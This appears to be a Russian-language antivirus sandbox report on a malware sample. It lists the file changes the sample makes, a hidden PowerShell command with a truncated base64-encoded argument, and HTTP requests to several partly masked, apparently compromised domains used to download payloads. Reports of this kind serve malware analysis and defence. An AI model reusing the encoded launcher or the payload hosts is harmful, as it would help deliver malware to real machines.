Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAGUAVAAtAEkAVABFAE0AIABWAGEAcgBpAGEAYgBsAGUAOgBWAGgARAAyADkANQAgACAAKAAgACAAWwBUAHkAcABlAF0AKAAiAHsAMgB9AHsANAB9AHsAMQB9AHsAMwB9AHsAMAB9ACIAIAAtAGYAJwAuAGQASQByAEUAQw...
- '%CommonProgramFiles(x86)%\Microsoft Shared\DW\DW20.EXE' -x -s 3852
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\jehhzda\ben14fr\g_jugk.exe
Изменяет следующие файлы
- %LOCALAPPDATA%\microsoft\penworkspace\discovercachedata.dat
Сетевая активность
Подключается к
- 'eu###ks7.com':80
- 'ni###ehlen.com':80
- 'ri###vest.vn':80
- '1c#.co.za':80
- '1c#.co.za':443
- 'x1.#.lencr.org':80
- 'pa####omputing.com':80
- 'wi####icolage.com':80
TCP
Запросы HTTP GET
- http://eu###ks7.com/administrator/ubdDbB/
- http://ni###ehlen.com/oldsite/nZSNQ/
- http://ni###ehlen.com/cgi-sys/suspendedpage.cgi
- http://www.ri###vest.vn/install/Zxh/
- http://www.1c#.co.za/1cAdmin/b/
- http://x1.#.lencr.org/
- http://pa####omputing.com/CraigsMagicSquare/f/
- http://wi####icolage.com/wp-admin/XiZrby/
Другие
- '1c#.co.za':443
UDP
- DNS ASK eu###ks7.com
- DNS ASK er##la.com
- DNS ASK li####ggiodisole.it
- DNS ASK ni###ehlen.com
- DNS ASK ri###vest.vn
- DNS ASK 1c#.co.za
- DNS ASK x1.#.lencr.org
- DNS ASK pa####omputing.com
- DNS ASK wi####icolage.com
Другое
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IABTAGUAVAAtAEkAVABFAE0AIABWAGEAcgBpAGEAYgBsAGUAOgBWAGgARAAyADkANQAgACAAKAAgACAAWwBUAHkAcABlAF0AKAAiAHsAMgB9AHsANAB9AHsAMQB9AHsAMwB9AHsAMAB9ACIAIAAtAGYAJwAuAGQASQByAEUAQw... (со скрытым окном)
